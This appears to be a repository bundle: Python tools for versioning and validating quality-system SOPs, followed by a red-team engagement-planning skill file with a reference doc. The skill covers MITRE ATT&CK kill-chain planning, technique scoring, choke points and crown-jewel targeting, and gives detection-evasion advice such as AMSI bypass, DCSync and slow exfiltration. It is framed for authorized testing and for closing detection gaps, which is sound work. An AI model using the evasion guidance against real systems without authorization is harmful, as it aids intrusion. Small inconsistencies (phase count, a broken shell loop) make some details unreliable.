help="Output format"
)
parser.add_argument(
"--interactive",
action="store_true",
help="Run in interactive mode"
)
parser.add_argument(
"--sample",
action="store_true",
help="Generate sample document JSON"
)
args = parser.parse_args()
if args.interactive:
interactive_mode()
return
if args.sample:
sample = {
"number": "SOP-02-001",
"title": "Document Control Procedure",
"doc_type": "SOP",
"revision": "03",
"status": "Effective",
"effective_date": "2024-01-15",
"review_date": "2025-01-15",
"author": "J. Smith",
"approver": "M. Jones",
"approval_date": "2024-01-10",
"change_history": [
{"revision": "01", "date": "2022-01-01", "description": "Initial release"},
{"revision": "02", "date": "2023-01-15", "description": "Updated approval workflow"},
{"revision": "03", "date": "2024-01-15", "description": "Added electronic signature requirements"}
],
"has_audit_trail": True,
"has_electronic_signature": True,
"signature_components": 2
}
print(json.dumps(sample, indent=2))
return
if args.doc:
with open(args.doc, "r") as f:
data = json.load(f)
doc = Document(
number=data.get("number", ""),
title=data.get("title", ""),
doc_type=data.get("doc_type", ""),
revision=data.get("revision", ""),
status=data.get("status", ""),
effective_date=data.get("effective_date"),
review_date=data.get("review_date"),
author=data.get("author"),
approver=data.get("approver"),
approval_date=data.get("approval_date"),
change_history=data.get("change_history", []),
has_audit_trail=data.get("has_audit_trail", False),
has_electronic_signature=data.get("has_electronic_signature", False),
signature_components=data.get("signature_components", 0)
)
else:
# Demo document
doc = Document(
number="SOP-02-001",
title="Document Control",
doc_type="SOP",
revision="01",
status="Effective",
effective_date="2024-01-15",
author="J. Smith",
has_audit_trail=True,
has_electronic_signature=True,
signature_components=2
)
validator = DocumentValidator(doc)
result = validator.validate()
if args.output == "json":
print(json.dumps(asdict(result), indent=2))
else:
print(format_text_output(result))
if __name__ == "__main__":
main()
FILE:scripts/document_version_control.py
#!/usr/bin/env python3
"""
Document Version Control for Quality Documentation
Manages document lifecycle for quality manuals, SOPs, work instructions, and forms.
Tracks versions, approvals, revisions, change history, electronic signatures per 21 CFR Part 11.
Features:
- Version numbering (Major.Minor.Edit, e.g., 2.1.3)
- Change control with impact assessment
- Review/approval workflows
- Electronic signature capture
- Document distribution tracking
- Training record integration
- Expiry/obsolete management
Usage:
python document_version_control.py --create new_sop.md
python document_version_control.py --revise existing_sop.md --reason "Regulatory update"
python document_version_control.py --status
python document_version_control.py --matrix --output json
"""
import argparse
import json
import os
import hashlib
from dataclasses import dataclass, field, asdict
from typing import List, Dict, Optional, Tuple
from datetime import datetime, timedelta
from pathlib import Path
import re
@dataclass
class DocumentVersion:
"""A single document version."""
doc_id: str
title: str
version: str
revision_date: str
author: str
status: str # "Draft", "Under Review", "Approved", "Obsolete"
change_summary: str = ""
next_review_date: str = ""
approved_by: List[str] = field(default_factory=list)
signed_by: List[Dict] = field(default_factory=list) # electronic signatures
attachments: List[str] = field(default_factory=list)
checksum: str = ""
template_version: str = "1.0"
@dataclass
class ChangeControl:
"""Change control record."""
change_id: str
document_id: str
change_type: str # "New", "Revision", "Withdrawal"
reason: str
impact_assessment: Dict # Quality, Regulatory, Training, etc.
risk_assessment: str
notifications: List[str]
effective_date: str
change_author: str
class DocumentVersionControl:
"""Manages quality document lifecycle and version control."""
VERSION_PATTERN = re.compile(r'^(\d+)\.(\d+)\.(\d+)$')
DOCUMENT_TYPES = {
'QMSM': 'Quality Management System Manual',
'SOP': 'Standard Operating Procedure',
'WI': 'Work Instruction',
'FORM': 'Form/Template',
'REC': 'Record',
'POL': 'Policy'
}
def __init__(self, doc_store_path: str = "./doc_store"):
self.doc_store = Path(doc_store_path)
self.doc_store.mkdir(parents=True, exist_ok=True)
self.metadata_file = self.doc_store / "metadata.json"
self.documents = self._load_metadata()
def _load_metadata(self) -> Dict[str, DocumentVersion]:
"""Load document metadata from storage."""
if self.metadata_file.exists():
with open(self.metadata_file, 'r', encoding='utf-8') as f:
data = json.load(f)
return {
doc_id: DocumentVersion(**doc_data)
for doc_id, doc_data in data.items()
}
return {}
def _save_metadata(self):
"""Save document metadata to storage."""
with open(self.metadata_file, 'w', encoding='utf-8') as f:
json.dump({
doc_id: asdict(doc)
for doc_id, doc in self.documents.items()
}, f, indent=2, ensure_ascii=False)
def _generate_doc_id(self, title: str, doc_type: str) -> str:
"""Generate unique document ID."""
# Extract first letters of words, append type code
words = re.findall(r'\b\w', title.upper())
prefix = ''.join(words[:3]) if words else 'DOC'
timestamp = datetime.now().strftime('%y%m%d%H%M')
return f"{prefix}-{doc_type}-{timestamp}"
def _parse_version(self, version: str) -> Tuple[int, int, int]:
"""Parse semantic version string."""
match = self.VERSION_PATTERN.match(version)
if match:
return tuple(int(x) for x in match.groups())
raise ValueError(f"Invalid version format: {version}")
def _increment_version(self, current: str, change_type: str) -> str:
"""Increment version based on change type."""
major, minor, edit = self._parse_version(current)
if change_type == "Major":
return f"{major+1}.0.0"
elif change_type == "Minor":
return f"{major}.{minor+1}.0"
else: # Edit
return f"{major}.{minor}.{edit+1}"
def _calculate_checksum(self, filepath: Path) -> str:
"""Calculate SHA256 checksum of document file."""
with open(filepath, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def create_document(
self,
title: str,
content: str,
author: str,
doc_type: str,
change_summary: str = "Initial release",
attachments: List[str] = None
) -> DocumentVersion:
"""Create a new document version."""
if doc_type not in self.DOCUMENT_TYPES:
raise ValueError(f"Invalid document type. Choose from: {list(self.DOCUMENT_TYPES.keys())}")
doc_id = self._generate_doc_id(title, doc_type)
version = "1.0.0"
revision_date = datetime.now().strftime('%Y-%m-%d')
next_review = (datetime.now() + timedelta(days=365)).strftime('%Y-%m-%d')
# Save document content
doc_path = self.doc_store / f"{doc_id}_v{version}.md"
with open(doc_path, 'w', encoding='utf-8') as f:
f.write(content)
doc = DocumentVersion(
doc_id=doc_id,
title=title,
version=version,
revision_date=revision_date,
author=author,
status="Approved", # Initially approved for simplicity
change_summary=change_summary,
next_review_date=next_review,
attachments=attachments or [],
checksum=self._calculate_checksum(doc_path)
)
self.documents[doc_id] = doc
self._save_metadata()
return doc
def revise_document(
self,
doc_id: str,
new_content: str,
change_author: str,
change_type: str = "Edit",
change_summary: str = "",
attachments: List[str] = None
) -> Optional[DocumentVersion]:
"""Create a new revision of an existing document."""
if doc_id not in self.documents:
return None
old_doc = self.documents[doc_id]
new_version = self._increment_version(old_doc.version, change_type)
revision_date = datetime.now().strftime('%Y-%m-%d')
# Archive old version
old_path = self.doc_store / f"{doc_id}_v{old_doc.version}.md"
archive_path = self.doc_store / "archive" / f"{doc_id}_v{old_doc.version}_{revision_date}.md"
archive_path.parent.mkdir(exist_ok=True)
if old_path.exists():
os.rename(old_path, archive_path)
# Save new content
doc_path = self.doc_store / f"{doc_id}_v{new_version}.md"
with open(doc_path, 'w', encoding='utf-8') as f:
f.write(new_content)
# Create new document record
new_doc = DocumentVersion(
doc_id=doc_id,
title=old_doc.title,
version=new_version,
revision_date=revision_date,
author=change_author,
status="Draft", # Needs re-approval
change_summary=change_summary or f"Revision {new_version}",
next_review_date=(datetime.now() + timedelta(days=365)).strftime('%Y-%m-%d'),
attachments=attachments or old_doc.attachments,
checksum=self._calculate_checksum(doc_path)
)
self.documents[doc_id] = new_doc
self._save_metadata()
return new_doc
def approve_document(
self,
doc_id: str,
approver_name: str,
approver_title: str,
comments: str = ""
) -> bool:
"""Approve a document with electronic signature."""
if doc_id not in self.documents:
return False
doc = self.documents[doc_id]
if doc.status != "Draft":
return False
signature = {
"name": approver_name,
"title": approver_title,
"date": datetime.now().strftime('%Y-%m-%d %H:%M'),
"comments": comments,
"signature_hash": hashlib.sha256(f"{doc_id}{doc.version}{approver_name}".encode()).hexdigest()[:16]
}
doc.approved_by.append(approver_name)
doc.signed_by.append(signature)
# Approve if enough approvers (simplified: 1 is enough for demo)
doc.status = "Approved"
self._save_metadata()
return True
def withdraw_document(self, doc_id: str, reason: str, withdrawn_by: str) -> bool:
"""Withdraw/obsolete a document."""
if doc_id not in self.documents:
return False
doc = self.documents[doc_id]
doc.status = "Obsolete"
doc.change_summary = f"OBsolete: {reason}"
# Add withdrawal signature
signature = {
"name": withdrawn_by,
"title": "QMS Manager",
"date": datetime.now().strftime('%Y-%m-%d %H:%M'),
"comments": reason,
"signature_hash": hashlib.sha256(f"{doc_id}OB{withdrawn_by}".encode()).hexdigest()[:16]
}
doc.signed_by.append(signature)
self._save_metadata()
return True
def get_document_history(self, doc_id: str) -> List[Dict]:
"""Get version history for a document."""
history = []
pattern = f"{doc_id}_v*.md"
for file in self.doc_store.glob(pattern):
match = re.search(r'_v(\d+\.\d+\.\d+)\.md$', file.name)
if match:
version = match.group(1)
stat = file.stat()
history.append({
"version": version,
"filename": file.name,
"size": stat.st_size,
"modified": datetime.fromtimestamp(stat.st_mtime).strftime('%Y-%m-%d %H:%M')
})
# Check archive
for file in (self.doc_store / "archive").glob(f"{doc_id}_v*.md"):
match = re.search(r'_v(\d+\.\d+\.\d+)_(\d{4}-\d{2}-\d{2})\.md$', file.name)
if match:
version, date = match.groups()
history.append({
"version": version,
"filename": file.name,
"status": "archived",
"archived_date": date
})
return sorted(history, key=lambda x: x["version"])
def generate_document_matrix(self) -> Dict:
"""Generate document matrix report."""
matrix = {
"total_documents": len(self.documents),
"by_status": {},
"by_type": {},
"documents": []
}
for doc in self.documents.values():
# By status
matrix["by_status"][doc.status] = matrix["by_status"].get(doc.status, 0) + 1
# By type (from doc_id)
doc_type = doc.doc_id.split('-')[1] if '-' in doc.doc_id else "Unknown"
matrix["by_type"][doc_type] = matrix["by_type"].get(doc_type, 0) + 1
matrix["documents"].append({
"doc_id": doc.doc_id,
"title": doc.title,
"type": doc_type,
"version": doc.version,
"status": doc.status,
"author": doc.author,
"last_modified": doc.revision_date,
"next_review": doc.next_review_date,
"approved_by": doc.approved_by
})
matrix["documents"].sort(key=lambda x: (x["type"], x["title"]))
return matrix
def format_matrix_text(matrix: Dict) -> str:
"""Format document matrix as text."""
lines = [
"=" * 80,
"QUALITY DOCUMENTATION MATRIX",
"=" * 80,
f"Total Documents: {matrix['total_documents']}",
"",
"BY STATUS",
"-" * 40,
]
for status, count in matrix["by_status"].items():
lines.append(f" {status}: {count}")
lines.extend([
"",
"BY TYPE",
"-" * 40,
])
for dtype, count in matrix["by_type"].items():
lines.append(f" {dtype}: {count}")
lines.extend([
"",
"DOCUMENT LIST",
"-" * 40,
f"{'ID':<20} {'Type':<8} {'Version':<10} {'Status':<12} {'Title':<30}",
"-" * 80,
])
for doc in matrix["documents"]:
lines.append(f"{doc['doc_id'][:19]:<20} {doc['type']:<8} {doc['version']:<10} {doc['status']:<12} {doc['title'][:29]:<30}")
lines.append("=" * 80)
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(description="Document Version Control for Quality Documentation")
parser.add_argument("--create", type=str, help="Create new document from template")
parser.add_argument("--title", type=str, help="Document title (required with --create)")
parser.add_argument("--type", choices=list(DocumentVersionControl.DOCUMENT_TYPES.keys()), help="Document type")
parser.add_argument("--author", type=str, default="QMS Manager", help="Document author")
parser.add_argument("--revise", type=str, help="Revise existing document (doc_id)")
parser.add_argument("--reason", type=str, help="Reason for revision")
parser.add_argument("--approve", type=str, help="Approve document (doc_id)")
parser.add_argument("--approver", type=str, help="Approver name")
parser.add_argument("--withdraw", type=str, help="Withdraw document (doc_id)")
parser.add_argument("--withdraw-reason", type=str, help="Withdrawal reason")
parser.add_argument("--status", action="store_true", help="Show document status")
parser.add_argument("--matrix", action="store_true", help="Generate document matrix")
parser.add_argument("--output", choices=["text", "json"], default="text")
parser.add_argument("--interactive", action="store_true", help="Interactive mode")
args = parser.parse_args()
dvc = DocumentVersionControl()
if args.create and args.title and args.type:
# Create new document with default content
template = f"""# {args.title}
**Document ID:** [auto-generated]
**Version:** 1.0.0
**Date:** {datetime.now().strftime('%Y-%m-%d')}
**Author:** {args.author}
## Purpose
[Describe the purpose and scope of this document]
## Responsibility
[List roles and responsibilities]
## Procedure
[Detailed procedure steps]
## References
[List referenced documents]
## Revision History
| Version | Date | Author | Change Summary |
|---------|------|--------|----------------|
| 1.0.0 | {datetime.now().strftime('%Y-%m-%d')} | {args.author} | Initial release |
"""
doc = dvc.create_document(
title=args.title,
content=template,
author=args.author,
doc_type=args.type,
change_summary=args.reason or "Initial release"
)
print(f"✅ Created document {doc.doc_id} v{doc.version}")
print(f" File: doc_store/{doc.doc_id}_v{doc.version}.md")
elif args.revise and args.reason:
# Add revision reason to the content (would normally modify the file)
print(f"📝 Would revise document {args.revise} - reason: {args.reason}")
print(" Note: In production, this would load existing content, make changes, and create new revision")
elif args.approve and args.approver:
success = dvc.approve_document(args.approve, args.approver, "QMS Manager")
print(f"{'✅ Approved' if success else '❌ Failed'} document {args.approve}")
elif args.withdraw and args.withdraw_reason:
success = dvc.withdraw_document(args.withdraw, args.withdraw_reason, "QMS Manager")
print(f"{'✅ Withdrawn' if success else '❌ Failed'} document {args.withdraw}")
elif args.matrix:
matrix = dvc.generate_document_matrix()
if args.output == "json":
print(json.dumps(matrix, indent=2))
else:
print(format_matrix_text(matrix))
elif args.status:
print("📋 Document Status:")
for doc_id, doc in dvc.documents.items():
print(f" {doc_id} v{doc.version} - {doc.title} [{doc.status}]")
else:
# Demo
print("📁 Document Version Control System Demo")
print(" Repository contains", len(dvc.documents), "documents")
if dvc.documents:
print("\n Existing documents:")
for doc in dvc.documents.values():
print(f" {doc.doc_id} v{doc.version} - {doc.title} ({doc.status})")
print("\n💡 Usage:")
print(" --create \"SOP-001\" --title \"Document Title\" --type SOP --author \"Your Name\"")
print(" --revise DOC-001 --reason \"Regulatory update\"")
print(" --approve DOC-001 --approver \"Approver Name\"")
print(" --matrix --output text/json")
if __name__ == "__main__":
main()
Lập kế hoạch và thực hiện red team được ủy quyền: phân tích đường tấn công, kill-chain MITRE ATT&CK, chấm điểm kỹ thuật, OPSEC và mục tiêu trọng yếu.
---
name: "red-team"
description: "Use when planning or executing authorized red team engagements, attack path analysis, or offensive security simulations. Covers MITRE ATT&CK kill-chain planning, technique scoring, choke point identification, OPSEC risk assessment, and crown jewel targeting."
---
# Red Team
Red team engagement planning and attack path analysis skill for authorized offensive security simulations. This is NOT vulnerability scanning (see security-pen-testing) or incident response (see incident-response) — this is about structured adversary simulation to test detection, response, and control effectiveness.
---
## Table of Contents
- [Overview](#overview)
- [Engagement Planner Tool](#engagement-planner-tool)
- [Kill-Chain Phase Methodology](#kill-chain-phase-methodology)
- [Technique Scoring and Prioritization](#technique-scoring-and-prioritization)
- [Choke Point Analysis](#choke-point-analysis)
- [OPSEC Risk Assessment](#opsec-risk-assessment)
- [Crown Jewel Targeting](#crown-jewel-targeting)
- [Attack Path Methodology](#attack-path-methodology)
- [Workflows](#workflows)
- [Anti-Patterns](#anti-patterns)
- [Cross-References](#cross-references)
---
## Overview
### What This Skill Does
This skill provides the methodology and tooling for **red team engagement planning** — building structured attack plans from MITRE ATT&CK technique selection, access level, and crown jewel targets. It scores techniques by effort and detection risk, assembles kill-chain phases, identifies choke points, and flags OPSEC risks.
### Distinction from Other Security Skills
| Skill | Focus | Approach |
|-------|-------|----------|
| **red-team** (this) | Adversary simulation | Offensive — structured attack planning and execution |
| security-pen-testing | Vulnerability discovery | Offensive — systematic exploitation of specific weaknesses |
| threat-detection | Finding attacker activity | Proactive — detect TTPs in telemetry |
| incident-response | Active incident management | Reactive — contain and investigate confirmed incidents |
### Authorization Requirement
**All red team activities described here require written authorization.** This includes a signed Rules of Engagement (RoE) document, defined scope, and explicit executive approval. The `engagement_planner.py` tool will not generate output without the `--authorized` flag. Unauthorized use of these techniques is illegal under the CFAA, Computer Misuse Act, and equivalent laws worldwide.
---
## Engagement Planner Tool
The `engagement_planner.py` tool builds a scored, kill-chain-ordered attack plan from technique selection, access level, and crown jewel targets.
```bash
# Basic engagement plan — external access, specific techniques
python3 scripts/engagement_planner.py \
--techniques T1059,T1078,T1003 \
--access-level external \
--authorized --json
# Internal network access with crown jewel targeting
python3 scripts/engagement_planner.py \
--techniques T1059,T1078,T1021,T1550,T1003 \
--access-level internal \
--crown-jewels "Database,Active Directory,Payment Systems" \
--authorized --json
# Credentialed (assumed breach) scenario with scale
python3 scripts/engagement_planner.py \
--techniques T1059,T1078,T1021,T1550,T1003,T1486,T1048 \
--access-level credentialed \
--crown-jewels "Domain Controller,S3 Data Lake" \
--target-count 50 \
--authorized --json
# List all 29 supported MITRE ATT&CK techniques
python3 scripts/engagement_planner.py --list-techniques
```
### Access Level Definitions
| Level | Starting Position | Techniques Available |
|-------|------------------|----------------------|
| external | No internal access — internet only | External-facing techniques only (T1190, T1566, etc.) |
| internal | Network foothold — no credentials | Internal recon + lateral movement prep |
| credentialed | Valid credentials obtained | Full kill chain including priv-esc, lateral movement, impact |
### Exit Codes
| Code | Meaning |
|------|---------|
| 0 | Engagement plan generated successfully |
| 1 | Missing authorization or invalid technique |
| 2 | Scope violation — technique outside access-level constraints |
---
## Kill-Chain Phase Methodology
The engagement planner organizes techniques into eight kill-chain phases and orders the execution plan accordingly.
### Kill-Chain Phase Order
| Phase | Order | MITRE Tactic | Examples |
|-------|-------|--------------|----------|
| Reconnaissance | 1 | TA0043 | T1595, T1596, T1598 |
| Resource Development | 2 | TA0042 | T1583, T1588 |
| Initial Access | 3 | TA0001 | T1190, T1566, T1078 |
| Execution | 4 | TA0002 | T1059, T1047, T1204 |
| Persistence | 5 | TA0003 | T1053, T1543, T1136 |
| Privilege Escalation | 6 | TA0004 | T1055, T1548, T1134 |
| Credential Access | 7 | TA0006 | T1003, T1110, T1558 |
| Lateral Movement | 8 | TA0008 | T1021, T1550, T1534 |
| Collection | 9 | TA0009 | T1074, T1560, T1114 |
| Exfiltration | 10 | TA0010 | T1048, T1041, T1567 |
| Impact | 11 | TA0040 | T1486, T1491, T1498 |
### Phase Execution Principles
Each phase must be completed before advancing to the next unless the engagement scope specifies assumed breach (skip to a later phase). Do not skip persistence before attempting lateral movement — persistence ensures operational continuity if a single foothold is detected and removed.
---
## Technique Scoring and Prioritization
Techniques are scored by effort (how hard to execute without detection) and prioritized in the engagement plan.
### Effort Score Formula
```
effort_score = detection_risk × (len(prerequisites) + 1)
```
Lower effort score = easier to execute without triggering detection.
### Technique Scoring Reference
| Technique | Detection Risk | Prerequisites | Effort Score | MITRE ID |
|-----------|---------------|---------------|-------------|---------|
| PowerShell execution | 0.7 | initial_access | 1.4 | T1059.001 |
| Scheduled task persistence | 0.5 | execution | 1.0 | T1053.005 |
| Pass-the-Hash | 0.6 | credential_access, internal_network | 1.8 | T1550.002 |
| LSASS credential dump | 0.8 | local_admin | 1.6 | T1003.001 |
| Spearphishing link | 0.4 | none | 0.4 | T1566.001 |
| Ransomware deployment | 0.9 | persistence, lateral_movement | 2.7 | T1486 |
---
## Choke Point Analysis
Choke points are techniques required by multiple paths to crown jewel assets. Detecting a choke point technique detects all attack paths that pass through it.
### Choke Point Identification
The engagement planner identifies choke points by finding techniques in `credential_access` and `privilege_escalation` tactics that serve as prerequisites for multiple subsequent techniques targeting crown jewels.
Prioritize detection rule development and monitoring density around choke point techniques — hardening a choke point has multiplied defensive value.
### Common Choke Points by Environment
| Environment Type | Common Choke Points | Detection Priority |
|-----------------|--------------------|--------------------|
| Active Directory domain | T1003 (credential dump), T1558 (Kerberoasting) | Highest |
| AWS environment | T1078.004 (cloud account), iam:PassRole chains | Highest |
| Hybrid cloud | T1550.002 (PtH), T1021.006 (WinRM) | High |
| Containerized apps | T1610 (deploy container), T1611 (container escape) | High |
Full methodology: `references/attack-path-methodology.md`
---
## OPSEC Risk Assessment
OPSEC risk items identify actions that are likely to trigger detection or leave persistent artifacts.
### OPSEC Risk Categories
| Tactic | Primary OPSEC Risk | Mitigation |
|--------|------------------|------------|
| Credential Access | LSASS memory access triggers EDR | Use LSASS-less techniques (DCSync, Kerberoasting) where possible |
| Execution | PowerShell command-line logging | Use AMSI bypass or alternative execution methods in scope |
| Lateral Movement | NTLM lateral movement generates event 4624 type 3 | Use Kerberos where possible; avoid NTLM over the network |
| Persistence | Scheduled tasks generate event 4698 | Use less-monitored persistence mechanisms within scope |
| Exfiltration | Large outbound transfers trigger DLP | Stage data and use slow exfil if stealth is required |
### OPSEC Checklist Before Each Phase
1. Is the technique in scope per RoE?
2. Will it generate logs that blue team monitors actively?
3. Is there a less-detectable alternative that achieves the same objective?
4. If detected, will it reveal the full operation or only the current foothold?
5. Are cleanup artifacts defined for post-exercise removal?
---
## Crown Jewel Targeting
Crown jewel assets are the high-value targets that define the success criteria of a red team engagement.
### Crown Jewel Classification
| Crown Jewel Type | Target Indicators | Attack Paths |
|-----------------|------------------|--------------|
| Domain Controller | AD DS, NTDS.dit, SYSVOL | Kerberoasting → DCSync → Golden Ticket |
| Database servers | Production SQL, NoSQL, data warehouse | Lateral movement → DBA account → data staging |
| Payment systems | PCI-scoped network, card data vault | Network pivot → service account → exfiltration |
| Source code repositories | Internal Git, build systems | VPN → internal git → code signing keys |
| Cloud management plane | AWS management console, IAM admin | Phishing → credential → AssumeRole chain |
Crown jewel definition is agreed upon in the RoE — engagement success is measured by whether red team reaches defined crown jewels, not by the number of vulnerabilities found.
---
## Attack Path Methodology
Attack path analysis identifies all viable routes from the starting access level to each crown jewel.
### Path Scoring
Each path is scored by:
- **Total effort score** (sum of per-technique effort scores)
- **Choke point count** (how many choke points the path passes through)
- **Detection probability** (product of per-technique detection risks)
Lower effort + fewer choke points = path of least resistance for the attacker.
### Attack Path Graph Construction
```
external
└─ T1566.001 (spearphishing) → initial_access
└─ T1059.001 (PowerShell) → execution
└─ T1003.001 (LSASS dump) → credential_access [CHOKE POINT]
└─ T1550.002 (Pass-the-Hash) → lateral_movement
└─ T1078.002 (domain account) → privilege_escalation
└─ Crown Jewel: Domain Controller
```
For the full scoring algorithm, choke point weighting, and effort-vs-impact matrix, see `references/attack-path-methodology.md`.
---
## Workflows
### Workflow 1: Quick Engagement Scoping (30 Minutes)
For scoping a focused red team exercise against a specific target:
```bash
# 1. Generate initial technique list from kill-chain coverage gaps
python3 scripts/engagement_planner.py --list-techniques
# 2. Build plan for external assumed-no-access scenario
python3 scripts/engagement_planner.py \
--techniques T1566,T1190,T1059,T1003,T1021 \
--access-level external \
--crown-jewels "Database Server" \
--authorized --json
# 3. Review choke_points and opsec_risks in output
# 4. Present kill-chain phases to stakeholders for scope approval
```
**Decision**: If choke_points are already covered by detection rules, focus on gaps. If not, those are the highest-value exercise targets.
### Workflow 2: Full Red Team Engagement (Multi-Week)
**Week 1 — Planning:**
1. Define crown jewels and success criteria with stakeholders
2. Sign RoE with defined scope, timeline, and out-of-scope exclusions
3. Build engagement plan with engagement_planner.py
4. Review OPSEC risks for each phase
**Week 2 — Execution (External Phase):**
1. Reconnaissance and target profiling
2. Initial access attempts (phishing, exploit public-facing)
3. Document each technique executed with timestamps
4. Log all detection events to validate blue team coverage
**Week 3 — Execution (Internal Phase):**
1. Establish persistence if initial access obtained
2. Execute credential access techniques (choke points)
3. Lateral movement toward crown jewels
4. Document when and how crown jewels were reached
**Week 4 — Reporting:**
1. Compile findings — techniques executed, detection rates, crown jewels reached
2. Map findings to detection gaps
3. Produce remediation recommendations prioritized by choke point impact
4. Deliver read-out to security leadership
### Workflow 3: Assumed Breach Tabletop
Simulate a compromised credential scenario for rapid detection testing:
```bash
# Assumed breach — credentialed access starting position
python3 scripts/engagement_planner.py \
--techniques T1059,T1078,T1021,T1550,T1003,T1048 \
--access-level credentialed \
--crown-jewels "Active Directory,S3 Data Bucket" \
--target-count 20 \
--authorized --json | jq '.phases, .choke_points, .opsec_risks'
# Run across multiple access levels to compare path options
for level in external internal credentialed; do
echo "=== level ==="
python3 scripts/engagement_planner.py \
--techniques T1059,T1078,T1003,T1021 \
--access-level "level" \
--authorized --json | jq '.total_effort_score, .phases | keys'
done
```
---
## Anti-Patterns
1. **Operating without written authorization** — Unauthorized red team activity against any system you don't own or have explicit permission to test is a criminal offense. The `--authorized` flag must reflect a real signed RoE, not just running the tool to bypass the check. Authorization must predate execution.
2. **Skipping kill-chain phase ordering** — Jumping directly to lateral movement without establishing persistence means a single detection wipes out the entire foothold. Follow the kill-chain phase order — each phase builds the foundation for the next.
3. **Not defining crown jewels before starting** — Engagements without defined success criteria drift into open-ended vulnerability hunting. Crown jewels and success conditions must be agreed upon in the RoE before the first technique is executed.
4. **Ignoring OPSEC risks in the plan** — Red team exercises test blue team detection. Deliberately avoiding all detectable techniques produces an unrealistic engagement that doesn't validate detection coverage. Use OPSEC risks to understand detection exposure, not to avoid it entirely.
5. **Failing to document executed techniques in real time** — Retroactive documentation of what was executed is unreliable. Log each technique, timestamp, and outcome as it happens. Post-engagement reporting must be based on contemporaneous records.
6. **Not cleaning up artifacts post-exercise** — Persistence mechanisms, new accounts, modified configurations, and staged data must be removed after engagement completion. Leaving red team artifacts creates permanent security risks and can be confused with real attacker activity.
7. **Treating path of least resistance as the only path** — Attackers adapt. Test multiple attack paths including higher-effort routes that may evade detection. Validating that the easiest path is detected is necessary but not sufficient.
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| [threat-detection](../threat-detection/SKILL.md) | Red team technique execution generates realistic TTPs that validate threat hunting hypotheses |
| [incident-response](../incident-response/SKILL.md) | Red team activity should trigger incident response procedures — detection and response quality is a primary success metric |
| [cloud-security](../cloud-security/SKILL.md) | Cloud posture findings (IAM misconfigs, S3 exposure) become red team attack path targets |
| [security-pen-testing](../security-pen-testing/SKILL.md) | Pen testing focuses on specific vulnerability exploitation; red team focuses on end-to-end kill-chain simulation to crown jewels |
FILE:references/attack-path-methodology.md
# Attack Path Methodology
Reference documentation for attack path graph construction, choke point scoring, and effort-vs-impact analysis used in red team engagement planning.
---
## Attack Path Graph Model
An attack path is a directed graph where:
- **Nodes** are ATT&CK techniques or system states (initial access, crown jewel reached)
- **Edges** represent prerequisite relationships between techniques
- **Weight** on each edge is the effort score for the destination technique
The goal is to find all paths from the starting node (access level) to each crown jewel node, and to identify which nodes have the highest betweenness centrality (choke points).
### Node Types
| Node Type | Description | Example |
|-----------|-------------|---------|
| Starting state | Attacker's initial access level | external, internal, credentialed |
| Technique node | A MITRE ATT&CK technique | T1566.001, T1003.001, T1550.002 |
| Tactic state | Intermediate state achieved after completing a tactic | initial_access_achieved, persistence_established |
| Crown jewel node | Target asset — defines engagement success | Domain Controller, S3 Data Lake |
---
## Effort Score Formula
Each technique is scored by how hard it is to execute in the environment without triggering detection:
```
effort_score = detection_risk × (prerequisite_count + 1)
```
Where:
- `detection_risk` is 0.0–1.0 (0 = trivial to execute, 1 = will be detected with high probability)
- `prerequisite_count` is the number of earlier techniques that must succeed before this one can be executed
A path's total effort score is the sum of effort scores for all techniques in the path.
### Technique Effort Score Reference
| Technique | Detection Risk | Prerequisites | Effort Score | Tactic |
|-----------|---------------|---------------|-------------|--------|
| T1566.001 Spearphishing Link | 0.40 | 0 | 0.40 | initial_access |
| T1190 Exploit Public-Facing Application | 0.55 | 0 | 0.55 | initial_access |
| T1078 Valid Accounts | 0.35 | 0 | 0.35 | initial_access |
| T1059.001 PowerShell | 0.70 | 1 | 1.40 | execution |
| T1047 WMI Execution | 0.60 | 1 | 1.20 | execution |
| T1053.005 Scheduled Task | 0.50 | 1 | 1.00 | persistence |
| T1543.003 Windows Service | 0.55 | 1 | 1.10 | persistence |
| T1003.001 LSASS Dump | 0.80 | 1 | 1.60 | credential_access |
| T1558.003 Kerberoasting | 0.65 | 1 | 1.30 | credential_access |
| T1110 Brute Force | 0.75 | 0 | 0.75 | credential_access |
| T1021.006 WinRM | 0.65 | 2 | 1.95 | lateral_movement |
| T1550.002 Pass-the-Hash | 0.60 | 2 | 1.80 | lateral_movement |
| T1078.002 Domain Account | 0.40 | 2 | 1.20 | lateral_movement |
| T1074.001 Local Data Staging | 0.45 | 3 | 1.80 | collection |
| T1048.003 Exfil via HTTP | 0.55 | 3 | 2.20 | exfiltration |
| T1486 Ransomware | 0.90 | 3 | 3.60 | impact |
---
## Choke Point Identification
A choke point is a technique node that:
1. Lies on multiple paths to crown jewel assets, AND
2. Has no alternative technique that achieves the same prerequisite state
### Choke Point Score
```
choke_point_score = (paths_through_node / total_paths_to_all_crown_jewels) × detection_risk
```
Techniques with a high choke point score have high defensive leverage — a detection rule for that technique covers the most attack paths.
### Common Choke Points by Environment
**Active Directory Domain:**
- T1003 (Credential Access) — required for Pass-the-Hash and most lateral movement
- T1558 (Kerberos Tickets) — Kerberoasting provides service account credentials for privilege escalation
**AWS Cloud:**
- iam:PassRole — required for most cloud privilege escalation paths
- T1078.004 (Valid Cloud Accounts) — credential compromise required for all cloud attack paths
**Hybrid Environment:**
- T1078.002 (Domain Accounts) — once domain credentials are obtained, both on-prem and cloud paths open
- T1021.001 (Remote Desktop Protocol) — primary lateral movement mechanism in Windows environments
---
## Effort-vs-Impact Matrix
Plot each path on two dimensions to prioritize red team focus:
| Quadrant | Effort | Impact | Priority |
|----------|--------|--------|----------|
| High Priority | Low | High | Test first — easiest path to critical asset |
| Medium Priority | Low | Low | Test after high priority |
| Medium Priority | High | High | Test — complex but high-value if successful |
| Low Priority | High | Low | Test last — costly and low-value |
**Effort** is the path's total effort score (lower = easier).
**Impact** is the crown jewel value (defined in RoE — Domain Controller = highest, individual workstation = lowest).
---
## Access Level Constraints
Not all techniques are available from all starting positions. The engagement planner enforces access level hierarchy:
| Access Level | Available Techniques | Blocked Techniques |
|-------------|---------------------|-------------------|
| external | Techniques requiring only internet access: T1190, T1566, T1110, T1078 (via credential stuffing) | Any technique requiring internal_network or local_admin |
| internal | All external + internal recon, lateral movement prep | Techniques requiring local_admin or domain_admin |
| credentialed | All techniques — full kill-chain available | None (assumes valid credentials = highest starting position) |
### Scope Violation Detection
